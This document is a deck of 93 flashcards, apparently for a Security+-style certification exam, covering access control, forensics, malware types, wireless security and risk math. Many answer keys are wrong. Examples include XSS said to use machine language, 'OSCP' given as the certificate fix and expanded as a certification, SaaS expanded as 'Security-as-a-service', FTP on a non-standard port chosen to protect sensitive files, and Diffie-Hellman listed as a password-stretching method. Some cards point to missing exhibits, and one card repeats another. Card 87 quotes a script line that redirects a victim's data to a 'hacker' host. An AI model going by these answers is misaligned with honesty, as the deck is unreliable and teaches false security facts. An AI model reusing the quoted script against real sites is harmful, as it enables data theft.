Topic 5 Flashcards

1
Q

A company wants to ensure confidential data from storage media is sanitized in such a way that the drive
cannot be reused. Which of the following method should the technician use?

Shredding
Wiping
Low-level formatting
Repartitioning
Overwriting
A

Shredding

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
2
Q

An organization’s employees currently use three different sets of credentials to access multiple internal
resources. Management wants to make this process less complex. Which of the following would be the BEST option to meet this goal?

Transitive trust
Single sign-on
Federation
Secure token

A

Single Sign on

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
3
Q

Students at a residence hall are reporting Internet connectivity issues. The university’s network administrator configured the residence hall’s network to provide public IP addresses to all connected devices, but many student devices are receiving private IP addresses due to rogue devices. The network administrator verifies the residence hall’s network is correctly configured and contacts the security administrator for help. Which of the following configurations should the security administrator suggest for implementation?

Router ACLs
BPDU guard
Flood guard
DHCP snooping

A

DHCP snooping

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
4
Q

Which of the following is a major difference between XSS attacks and remote code exploits?

XSS attacks use machine language, while remote exploits use interpreted language

XSS attacks target servers, while remote code exploits target clients

Remote code exploits aim to escalate attackers’ privileges, while XSS attacks aim to gain access only

Remote code exploits allow writing code at the client side and executing it, while XSS attacks require
no code to work

A

XSS attacks use machine language, while remote exploits use interpreted language

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
5
Q

An attachment that was emailed to finance employees contained an embedded message. The security
administrator investigates and finds the intent was to conceal the embedded information from public view.
Which of the following BEST describes this type of message?

Obfuscation
Stenography
Diffusion
BCRYPT

A

Obfuscation

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
6
Q

Which of the following locations contain the MOST volatile data?

SSD
Paging file
RAM
Cache memory

A

Cache memory

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
7
Q

An incident response analyst at a large corporation is reviewing proxy data log. The analyst believes a
malware infection may have occurred. Upon further review, the analyst determines the computer responsible for the suspicious network traffic is used by the Chief Executive Officer (CEO).

Which of the following is the best NEXT step for the analyst to take?

Call the CEO directly to ensure awareness of the event
Run a malware scan on the CEO’s workstation
Reimage the CEO’s workstation
Disconnect the CEO’s workstation from the network

A

Disconnect the CEO’s workstation from the network

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
8
Q

Which of the following is a random value appended to a credential that makes the credential less susceptible to compromise when hashed?

Nonce
Salt
OTP
Block cipher
IV
A

Salt

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
9
Q

A systems administrator found a suspicious file in the root of the file system. The file contains URLs,
usernames, passwords, and text from other documents being edited on the system. Which of the following
types of malware would generate such a file?

Keylogger
Rootkit
Bot
RAT

A

Keylogger

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
10
Q

A company utilizes 802.11 for all client connectivity within a facility. Users in one part of the building are
reporting they are unable to access company resources when connected to the company SSID.
Which of the following should the security administrator use to assess connectivity?

Sniffer
Honeypot
Routing tables
Wireless scanner

A

Routing tables

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
11
Q

An analyst generates the following color-coded table shown in the exhibit to help explain the risk of potential
incidents in the company. The vertical axis indicates the likelihood or an incident, while the horizontal axis
indicates the impact.

Which of the following is this table an example of?

Internal threat assessment
Privacy impact assessment
Qualitative risk assessment
Supply chain assessment

A

Qualitative risk assessment

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
12
Q

Legal authorities notify a company that its network has been compromised for the second time in two years.
The investigation shows the attackers were able to use the same vulnerability on different systems in both
attacks. Which of the following would have allowed the security team to use historical information to protect
against the second attack?

Key risk indicators
Lessons learned
Recovery point objectives
Tabletop exercise

A

Lessons learned

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
13
Q

An organization identifies a number of hosts making outbound connections to a known malicious IP over port TCP 80. The organization wants to identify the data being transmitted and prevent future connections to this IP. Which of the following should the organization do to achieve this outcome?

Use a protocol analyzer to reconstruct the data and implement a web-proxy.
Deploy a web-proxy and then blacklist the IP on the firewall.
Deploy a web-proxy and implement IPS at the network edge.
Use a protocol analyzer to reconstruct the data and blacklist the IP on the firewall.

A

Use a protocol analyzer to reconstruct the data and blacklist the IP on the firewall.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
14
Q

A security technician has been given the task of preserving emails that are potentially involved in a dispute between a company and a contractor.
Which of the following BEST describes this forensic concept?

Legal hold
Chain of custody
Order of volatility
Data acquisition

A

Legal hold

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
15
Q

A security engineer is configuring a wireless network with EAP-TLS. Which of the following activities is a
requirement for this configuration?

Setting up a TACACS+ server
Configuring federation between authentication servers
Enabling TOTP
Deploying certificates to endpoint devices

A

Deploying certificates to endpoint devices

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
16
Q

Which of the following uses tokens between the identity provider and the service provider to authenticate and authorize users to resources?

RADIUS
SSH
OAuth
MSCHAP

A

OAuth

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
17
Q

Which of the following is an example of resource exhaustion?

A penetration tester requests every available IP address from a DHCP server.
An SQL injection attack returns confidential data back to the browser.
Server CPU utilization peaks at 100% during the reboot process.
System requirements for a new software package recommend having 12GB of RAM, but only BGB are available.

A

A penetration tester requests every available IP address from a DHCP server

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
18
Q

A company recently updated its website to increase sales. The new website uses PHP forms for leads and
provides a directory with sales staff and their phone numbers. A systems administrator is concerned with the new website and provides the following log to support the concern:

Which of the following is the systems administrator MOST likely to suggest to the Chief Information Security Officer (CISO) based on the above?

Changing the account standard naming convention
Implementing account lockouts
Discontinuing the use of privileged accounts
Increasing the minimum password length from eight to ten characters

A

Changing the account standard naming convention

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
19
Q

An organization’s Chief Executive Officer (CEO) directs a newly hired computer technician to install an OS
on the CEO’s personal laptop. The technician performs the installation, and a software audit later in the month indicates a violation of the EULA occurred as a result.

Which of the following would address this violation
going forward?

Security configuration baseline
Separation of duties
AUP
NDA

A

AUP (acceptable use policy)

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
20
Q

A security administrator is implementing a secure method that allows developers to place files or objects onto a Linux Server. Developers are required to log in using a username, password, and asymmetirc key. Which of the following protocols should be implemented?

ssl/tls
sftp
srtp
ipsec

A

SFTP

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
21
Q

A network technician is designing a network for a small company. The network technician needs to implement
an email server and web server that will be accessed by both internal employees and external customers.
Which of the following would BEST secure the internal network and allow access to the needed servers?

Implementing a site-to-site VPN for server access.
Implementing a DMZ segment for the server.
Implementing NAT addressing for the servers.
Implementing a sandbox to contain the servers.

A

Implementing a DMZ segment for the server

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
22
Q

A Chief Information Officer (CIO) asks the company’s security specialist if the company should spend any
funds on malware protection for a specific server. Based on a risk assessment, the ARO value of a malware infection for a server is 5 and the annual cost for the malware protection is $2500. Which of the following SLE values warrants a recommendation against purchasing the malware protection?

$500
$1000
$2000
$2500

A

$500

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
23
Q

A security auditor is reviewing the following output from file integrity monitoring software installed on a very busy server at a large service provider. The server has not been updates since it was installed. Drag and drop the log entry that identifies the first instance of server compromise.

Page 229

A

1/1/2017 3:30:00

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
24
Q

Which of the following control types would a backup of server data provide in case of a system issue?

Corrective
Deterrent
Preventive
Detective

A

Corrective

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
25
Q

A penetration testing team deploys a specifically crafted payload to a web server, which results in opening a new session as the web server daemon. This session has full read/write access to the file system and the admin console. Which of the following BEST describes the attack?

Domain hijacking
Injection
Buffer overflow
Privilege escalation

A

Privilege escalation

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
26
Q

A security administrator suspects that a DDoS attack is affecting the DNS server. The administrator accesses a
workstation with the hostname of workstation01 on the network and obtains the following output from the
ipconfig command:

The administrator successfully pings the DNS server from the workstation. Which of the following commands
should be issued from the workstation to verify the DDoS attack is no longer occurring?

dig www.google.com
dig 192.168.1.254
dig workstation01.com
dig 192.168.1.26

A

dig workstation01.com

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
27
Q

After reports of slow internet connectivity, a technician reviews the following logs from a server’s host-based
firewall:

Which of the following can the technician conclude after reviewing the above logs?

The server is under a DDoS attack from multiple geographic locations.

The server is compromised, and is attacking multiple hosts on the Internet.

The server is under an IP spoofing resource exhaustion attack.

The server is unable to complete the TCP three-way handshake and send the last ACK.

A

The server is under an IP spoofing resource exhaustion attack.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
28
Q

A company wants to implement an access management solution that allows employees to use the same usernames and passwords for multiple applications without having to keep multiple credentials synchronized.

Which of the following solutions would BEST meet these requirements?

Multifactor authentication
SSO
Biometrics
PKI
Federation
A

SSO

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
29
Q

An audit reported has identifies a weakness that could allow unauthorized personnel access to the facility at its main entrance and from there gain access to the network. Which of the following would BEST resolve the vulnerability?

Faraday cage
Air gap
Mantrap
Bollards

A

Mantrap

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
30
Q

A security analyst believes an employee’s workstation has been compromised. The analyst reviews the system
logs, but does not find any attempted logins. The analyst then runs the diff command, comparing the
C:\Windows\System32 directory and the installed cache directory. The analyst finds a series of files that look
suspicious.
One of the files contains the following commands:
Which of the following types of malware was used?

Worm
Spyware
Logic bomb
Backdoor

A

Backdoor

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
31
Q

A recent penetration test revealed several issues with a public-facing website used by customers. The testers were able to:

  • Enter long lines of code and special characters
  • Crash the system
  • Gain unauthorized access to the internal application server
  • Map the internal network
    The development team has stated they will need to rewrite a significant portion of the code used, and it will take more than a year to deliver the finished product. Which of the following would be the BEST solution to introduce in the interim?
Content fileting
WAF
TLS
IPS/IDS
UTM
A

UTM (unified threat management)

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
32
Q

Which of the following scenarios BEST describes an implementation of non-repudiation?

A user logs into a domain workstation and access network file shares for another department
A user remotely logs into the mail server with another user’s credentials
A user sends a digitally signed email to the entire finance department about an upcoming meeting
A user access the workstation registry to make unauthorized changes to enable functionality within an
application

A

A user sends a digitally signed email to the entire finance department about an upcoming meeting.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
33
Q

A forensic expert is given a hard drive from a crime scene and is asked to perform an investigation. Which of the following is the FIRST step the forensic expert needs to take the chain of custody?

Make a forensic copy
Create a hash of the hard drive
Recover the hard drive data
Update the evidence log

A

Update the evidence log

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
34
Q

As part of a corporate merger, two companies are combining resources. As a result, they must transfer files through the Internet in a secure manner. Which of the following protocols would BEST meet this objective? (Choose two.)

LDAPS
SFTP
HTTPS
DNSSEC
SRTP
A

SFTP

HTTPS

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
35
Q

A security specialist is notified about a certificate warning that users receive when using a new internal
website. After being given the URL from one of the users and seeing the warning, the security specialist
inspects the certificate and realizes it has been issued to the IP address, which is how the developers reach the site.
Which of the following would BEST resolve the issue?

OSCP
OID
PEM
SAN

A

OSCP (Offensive Security Certified Professional)

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
36
Q

A security analyst is inspecting the results of a recent internal vulnerability scan that was performed against
intranet services. The scan reports include the following critical-rated vulnerability:

Title: Remote Command Execution vulnerability in web server Rating: Critical (CVSS 10.0)
Threat actor: any remote user of the web server
Confidence: certain
Recommendation: apply vendor patches

Which of the following actions should the security analyst perform FIRST?

Escalate the issue to senior management.
Apply organizational context to the risk rating.
Organize for urgent out-of-cycle patching.
Exploit the server to check whether it is a false positive.

A

Apply organizational context to the risk rating

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
37
Q

A company wishes to move all of its services and applications to a cloud provider but wants to maintain full control of the deployment, access, and provisions of its services to its users.
Which of the following BEST represents the required cloud deployment model?

SaaS
IaaS
MaaS
Hybrid
Private
A

SaaS (Security-as-a-service)

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
38
Q

An organization is developing its mobile device management policies and procedures and is concerned about vulnerabilities associated with sensitive data being saved to a mobile device, as well as weak authentication when using a PIN As part or discussions on the topic several solutions are proposed Which of the following controls when required together, will address the protection of data at-rest as well as strong authentication? (Select TWO).

Containerization
FDE
Remote wipe capability
MDM
MFA
OTA updates
A

Containerization

and

FDE (full disk encryption)

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
39
Q

A security analyst is mitigating a pass-the-hash vulnerability on a Windows infrastructure. Given the
requirement, which of the following should the security analyst do to MINIMIZE the risk?

Enable CHAP
Disable NTLM
Enable Kerebos
Disable PAP

A

Disable NTLM (New Technology LAN Manager)

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
40
Q

A network administrator is brute forcing accounts through a web interface. Which of the following would
provide the BEST defense from an account password being discovered?

Password history
Account lockout
Account expiration
Password complexity

A

Account lockout

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
41
Q

A security analyst is assessing a small company’s internal servers against recommended security practices. Which of the following should the analyst do to conduct the assessment? (Choose two.)

Compare configurations against platform benchmarks
Confirm adherence to the company’s industry-specific regulations
Review the company’s current security baseline
Verify alignment with policy related to regulatory compliance
Run an exploitation framework to confirm vulnerabilities

A

Review the company’s current security baseline

and

Run an exploitation framework to confirm vulnerabilities

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
42
Q

A security administrator is performing a risk assessment on a legacy WAP with a WEP-enabled wireless infrastructure. Which of the following should be implemented to harden the infrastructure without upgrading the WAP?

Implement WPA and TKIP
Implement WPS and an eight-digit pin
Implement WEP and RC4
Implement WPA2 Enterprise

A

Implement WPA2 Enterprise

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
43
Q

An organization is looking to build its second head office another city, which has a history flooding with an
average of two flooding every 100 years. The estimated building cost is $1 million, an the estimated damage due to flooding is half of the building’s cost. Given this information, which of the following is the SLE?

$50,000
$250,000
$500,000
$1,000,000

A

$500,000

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
44
Q

A user is unable to open a file that has a grayed-out icon with a lock. The user receives a pop-up message
indicating that payment must be sent in Bitcoin to unlock the file. Later in the day, other users in the
organization lose the ability to open files on the server.
Which of the following has MOST likely occurred? (Choose three.)

Crypto-malware
Adware
Botnet attack
Virus
Ransomware
Backdoor
DDoS attack
A

Crypto-malware

Virus

Ransomware

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
45
Q

A security technician is configuring an access management system to track and record user actions. Which of the following functions should the technician configure?

Accounting
Authorization
Authentication
Identification

A

Accounting

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
46
Q

Which of the following components of printers and MFDs are MOST likely to be used as vectors of
compromise if they are improperly configured?

Embedded web server
Spooler
Network interface
LCD control panel

A

Embedded web server

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
47
Q

Which of the following terms BEST describes an exploitable vulnerability that exists but has not been publicly disclosed yet?

Design weakness
Zero-day
Logic bomb
Trojan

A

Zero-day

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
48
Q

Which of the following BEST explains why a development environment should have the same database server secure baseline that exist in production even if there is no PII in the database?

Without the same configuration in both development and production, there are no assurance that
changes made in development will have the same effect in production.

Attackers can extract sensitive, personal information from lower development environment databases
just as easily as they can from production databases.

Databases are unique in their need to have secure configurations applied in all environment because they
are attacked more often.

Laws stipulate that databases with the ability to store personal information must be secured regardless of
the environment or if they actually have PIL.

A

Laws stipulate that databases with the ability to store personal information must be secured regardless of the environment or if they actually have PIL

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
49
Q

A security administrator has written a script that will automatically upload binary and text-based configuration files onto a remote server using a scheduled task. The configuration files contain sensitive information. Which of the following should the administrator use? (Select TWO)

TOPT
SCP
FTP over a non-standard pot
SRTP
Certificate-based authentication
SNMPv3
A

FTP over a non-standard port

and

Certificate-based authentication

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
50
Q

Which of the following would provide additional security by adding another factor to a smart card?

Token
Proximity badge
Physical key
PIN

A

PIN

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
51
Q

A company wants to implement a wireless network with the following requirements:

All wireless users will have a unique credential.
User certificates will not be required for authentication.
The company’s AAA infrastructure must be utilized.
Local hosts should not store authentication tokens.

Which of the following should be used in the design to meet the requirements?

EAP-TLS
WPS
PSK
PEAP

A

PEAP (protected extensible authentication protocol)

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
52
Q

A security analyst identified an SQL injection attack.
Which of the following is the FIRST step in remediating the vulnerability?

Implement stored procedures.
Implement proper error handling.
Implement input validations.
Implement a WAF.

A

Implement input validations

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
53
Q

A security administrator wants to implement least privilege access for a network share that stores sensitive company data. The organization is particularly concerned with the integrity of data and implementing
discretionary access control. The following controls are available:

Read = A user can read the content of an existing file.
White = A user can modify the content of an existing file and delete an existing file.
Create = A user can create a new file and place data within the file.

A missing control means the user does not have that access. Which of the following configurations provides
the appropriate control to support the organization/s requirements?

A. Owners: Read, Write, CreateGroup Members: Read, WriteOthers: Read, Create

B. Owners: Read, CreateGroup Members: Read, Write, CreateOthers: Read

C. Owners: Read, WriteGroup Members: Read, CreateOthers: Read, Create

D. Owners: Write, CreateGroup Members: Read, CreateOthers: Read, Write, Create

A

A. Owners: Read, Write, CreateGroup
Members: Read, Write
Others: Read, Create

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
54
Q

A consumer purchases an exploit from the dark web. The exploit targets the online shopping cart of a popular website, allowing the shopper to modify the price of an item as checkout. Which of the following BEST describes this type of user?

Insider
Script kiddie
Competitor
Hacktivist
APT
A

Script kiddie

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
55
Q

After a security assessment was performed on the enterprise network, it was discovered that:

Configuration changes have been made by users without the consent of IT.
Network congestion has increased due to the use of social media.
Users are accessing file folders and network shares that are beyond the scope of their need to know.

Which of the following BEST describe the vulnerabilities that exist in this environment? (Choose two.)

Poorly trained users
Misconfigured WAP settings
Undocumented assets
Improperly configured accounts
Vulnerable business processes
A

Poorly trained users

and

Improperly configured accounts

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
56
Q

A company recently experienced data exfiltration via the corporate network. In response to the breach, a
security analyst recommends deploying an out-of-band IDS solution. The analyst says the solution can be
implemented without purchasing any additional network hardware. Which of the following solutions will be used to deploy the IDS?

Network tap
Network proxy
Honeypot
Port mirroring

A

Port mirroring

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
57
Q

An organization has an account management policy that defines parameters around each type of account. The policy specifies different security attributes, such as longevity, usage auditing, password complexity, and
identity proofing. The goal of the account management policy is to ensure the highest level of security while
providing the greatest availability without compromising data integrity for users. Which of the following account types should the policy specify for service technicians from corporate partners?

Guest account
User account
Shared account
Privileged user account
Default account
Service account
A

Privileged user account

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
58
Q

An organization is expanding its network team. Currently, it has local accounts on all network devices, but with growth, it wants to move to centrally managed authentication. Which of the following are the BEST
solutions for the organization? (Select TWO)

TACACS+
CHAP
LDAP
RADIUS
MSCHAPv2
A

TACACS+

and

RADIUS

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
59
Q

Ann, a user, reports she is unable to access an application from her desktop. A security analyst verifies Ann’s access and checks the SIEM for any errors. The security analyst reviews the log file from Ann’s system and notices the following output:

Which of the following is MOST likely preventing Ann from accessing the application from the desktop?

Web application firewall
DLP
Host-based firewall
UTM
Network-based firewall
A

Host-based firewall

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
60
Q

A security administrator is analyzing a user report in which the computer exhibits odd network-related
outages. The administrator, however, does not see any suspicious process running. A prior technician’s notes
indicate the machine has been remediated twice, but the system still exhibits odd behavior. Files were deleted from the system recently.
Which of the following is the MOST likely cause of this behavior?

Crypto-malware
Rootkit
Logic bomb
Session hijacking

A

Rootkit

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
61
Q

A security engineer must install the same x.509 certificate on three different servers. The client application that connects to the server performs a check to ensure the certificate matches the host name. Which of the following should the security engineer use?

Wildcard certificate
Extended validation certificate
Certificate chaining
Certificate utilizing the SAN file

A

Certificate utilizing the SAN (subject alternate names) file

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
62
Q

An office recently completed digitizing all its paper records. Joe, the data custodian, has been tasked with the disposal of the paper files, which include:

Intellectual property
Payroll records
Financial information
Drug screening results

Which of the following is the BEST way to dispose of these items?

Shredding
Pulping
Deidentifying
Recycling

A

Pulping

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
63
Q

A security analyst is hardening a large-scale wireless network. The primary requirements are the following:

Must use authentication through EAP-TLS certificates
Must use an AAA server
Must use the most secure encryption protocol
Given these requirements, which of the following should the analyst implement and recommend? (Select
TWO.)

802.1X
802.3
LDAP
TKIP
CCMP
WPA2-PSK

A

802.1X

and

WPA2-PSK

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
64
Q

A company is planning to utilize its legacy desktop systems by converting them into dummy terminals and
moving all heavy applications and storage to a centralized server that hosts all of the company’s required desktop applications. Which of the following describes the BEST deployment method to meet these
requirements?

IaaS
VM sprawl
VDI
PaaS

A

VDI

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
65
Q

Ann, a customer, is reporting that several important files are missing from her workstation. She recently
received communication from an unknown party who is requesting funds to restore the files. Which of the
following attacks has occurred?

Ransomware
Keylogger
Buffer overflow
Rootkit

A

Ransomware

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
66
Q

Which of the following needs to be performed during a forensics investigation to ensure the data contained in
a drive image has not been compromised?

Follow the proper chain of custody procedures.
Compare the image hash to the original hash.
Ensure a legal hold has been placed on the image.
Verify the time offset on the image file.

A

Compare the image hash to the original hash

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
67
Q

An administrator is implementing a secure web server and wants to ensure that if the web server application is compromised, the application does not have access to other parts of the server or network. Which of the
following should the administrator implement? (Choose two.)

Mandatory access control
Discretionary access control
Rule-based access control
Role-based access control
Attribute-based access control
A

Mandatory access control

and

Rule-based access control

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
68
Q

Users are attempting to access a company’s website but are transparently redirected to another websites. The users confirm the URL is correct. Which of the following would BEST prevent this issue in the future?

DNSSEC
HTTPS
IPSec
TLS/SSL

A

DNSSEC

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
69
Q

A network technician is setting up a new branch for a company. The users at the new branch will need to
access resources securely as if they were at the main location. Which of the following networking concepts
would BEST accomplish this?

Virtual network segmentation
Physical network segmentation
Site-to-site VPN
Out-of-band access
Logical VLANs
A

Site-to-site VPN

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
70
Q

The help desk received a call after hours from an employee who was attempting to log into the payroll server remotely. When the help desk returned the call the next morning, the employee was able to log into the server remotely without incident. However, the incident occurred again the next evening. Which of the following BEST describes the cause of the issue?

The password expired on the account and needed to be reset
The employee does not have the rights needed to access the database remotely
Time-of-day restrictions prevented the account from logging in
The employee’s account was locked out and needed to be unlocked

A

Time of date restrictions prevented the account from logging in

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
71
Q

A customer calls a technician and needs to remotely connect to a web server to change some code manually. The technician needs to configure the user’s machine with protocols to connect to the Unix web server, which is behind a firewall. Which of the following protocols does the technician MOST likely need to configure?

SSH
SFTP
HTTPS
SNMP

A

SSH

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
72
Q

Which of the following are used to substantially increase the computation time required to crack a password? (Choose two.)

BCRYPT
Substitution cipher
ECDHE
PBKDF2
Diffie-Hellman
A

BCRYPT

and

Diffie-Hellman

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
73
Q

An organization wants to ensure network access is granted only after a user or device has been authenticated.
Which of the following should be used to achieve this objective for both wired and wireless networks?

CCMP
PKCS#12
IEEE 802.1X
OCSP

A

IEEE 802.1x

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
74
Q

Which of the following terms BEST describes an exploitable vulnerability that exists but has not been publicly disclosed yet?

Design weakness
Zero-day
Logic bomb
Trojan

A

Zero-day

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
75
Q

A small company’s Chief Executive Officer (CEO) has asked its Chief Security Officer (CSO) to improve the
company’s security posture quickly with regard to targeted attacks. Which of the following should the CSO conduct FIRST?

Survey threat feeds from services inside the same industry.
Purchase multiple threat feeds to ensure diversity and implement blocks for malicious traffic
Conduct an internal audit against industry best practices to perform a qualitative analysis.
Deploy a UTM solution that receives frequent updates from a trusted industry vendor.

A

Survey threat feeds from services inside the same industry

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
76
Q

A company has purchased a new SaaS application and is in the process of configuring it to meet the
company’s needs. The director of security has requested that the SaaS application be integrated into the company’s IAM processes. Which of the following configurations should the security administrator set up in order to complete this request?

LDAP
RADIUS
SAML
NTLM

A

RADIUS

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
77
Q

A security administrator is developing a methodology for tracking staff access to patient data. Which of
the following would be the BEST method of creating audit trails for usage reports?

Deploy file integrity checking
Restrict access to the database by following the principle of least privilege
Implementing a database activity monitoring system
Created automated alerts on the IDS system for the database server

A

Implementing a database activity monitoring system

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
78
Q

A recent internal audit is forcing a company to review each internal business unit’s VMs because the cluster
they are installed on is in danger of running out of computer resources. Which of the following vulnerabilities exist?

Buffer overflow
End-of-life systems
System sprawl
Weak configuration

A

System sprawl

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
79
Q

A user downloads and installs an MP3 converter, and runs the application. Upon running the application, the
antivirus detects a new port in a listening state. Which of the following has the user MOST likely executed?

RAT
Worm
Ransomware
Bot

A

RAT

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
80
Q

A security administrator wants to determine if a company’s web servers have the latest operating system and application patches installed. Which of the following types of vulnerability scans should be conducted?

Non-credentialed
Passive
Port
Credentialed
Red team
Active
A

Credentialed

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
81
Q

A company has won an important government contract. Several employees have been transferred from their existing projects to support a new contract. Some of the employees who have transferred will be working long hours and still need access to their project information to transition work to their replacements.
Which of the following should be implemented to validate that the appropriate offboarding process has been followed?

Separation of duties
Time-of-day restrictions
Permission auditing
Mandatory access control

A

Permission auditing

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
82
Q

See PDF 253

A

PDF 253

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
83
Q

A technician is configuring a load balancer for the application team to accelerate the network performance of their applications. The applications are hosted on multiple servers and must be redundant. Given this scenario, which of the following would be the BEST method of configuring the load balancer?

Round-robin
Weighted
Least connection
Locality-based

A

Locality-based

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
84
Q

Several workstations on a network are found to be on OS versions that are vulnerable to a specific attack.
Which of the following is considered to be a corrective action to combat this vulnerability?

Install an antivirus definition patch
Educate the workstation users
Leverage server isolation
Install a vendor-supplied patch
Install an intrusion detection system
A

Install a vendor-supplied patch

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
85
Q

A security administrator is investigating many recent incident of credential theft for users accessing the
company’s website, despite the hosting web server requiring HTTPS for access. The server’s logs show the
website leverages the HTTP POST method for carrying user authentication details.

Which of the following is the MOST likely reason for compromise?

The HTTP POST method is not protected by HTTPS.
The web server is running a vulnerable SSL configuration.
The company does not support DNSSEC.
The HTTP response is susceptible to sniffing.

A

The HTTP POST method is not protected by HTTPS

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
86
Q

Which of the following enables sniffing attacks against a switched network?

ARP poisoning
IGMP snooping
IP spoofing
SYN flooding

A

ARP poisoning

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
87
Q

An attacker exploited a vulnerability on a mail server using the code below.

onload=document.location.replace
(‘‘http://hacker/post.asp?victim?message =’

Which of the following BEST explains what the attacker is doing?

The attacker is replacing a cookie.
The attacker is stealing a document.
The attacker is replacing a document.
The attacker is deleting a cookie.

A

The attacker is replacing a document

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
88
Q

An organization wants to implement a method to correct risks at the system/application layer. Which of the following is the BEST method to accomplish this goal?

IDS/IPS
IP tunneling
Web application firewall
Patch management

A

Web application firewall

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
89
Q

An application developer has neglected to include input validation checks in the design of the company’s new web application. An employee discovers that repeatedly submitting large amounts of data, including custom code, to an application will allow the execution of the custom code at the administrator level. Which of the following BEST identifies this application attack?

Cross-site scripting
Clickjacking
Buffer overflow
Replay

A

Buffer overflow

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
90
Q

Which of the following types of security testing is the MOST cost-effective approach used to analyze existing
code and identity areas that require patching?

Black box
Gray box
White box
Red team

A

White box

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
91
Q

A company is performing an analysis of the corporate enterprise network with the intent of identifying any one system, person, function, or service that, when neutralized, will cause or cascade disproportionate damage to the company’s revenue, referrals, and reputation.

Which of the following an element of the BIA that this action is addressing?

Identification of critical systems
Single point of failure
Value assessment
Risk register

A

Identification of critical systems

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
92
Q

A group of developers is collaborating to write software for a company. The developers need to work in subgroups and control who has access to their modules. Which of the following access control methods is considered user-centric?

Time-based
Mandatory
Rule-based
Discretionary

A

Discretionary

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
93
Q

An organization has several production-critical SCADA supervisory systems that cannot follow the normal
30-day patching policy. Which of the following BEST maximizes the protection of these systems from
malicious software?

Configure a firewall with deep packet inspection that restricts traffic to the systems.
Configure a separate zone for the systems and restrict access to known ports.
Configure the systems to ensure only necessary applications are able to run.
Configure the host firewall to ensure only the necessary applications have listening ports

A

Configure a firewall with deep packet inspection that restricts traffic to the systems.

How well did you know this?
1
Not at all
2
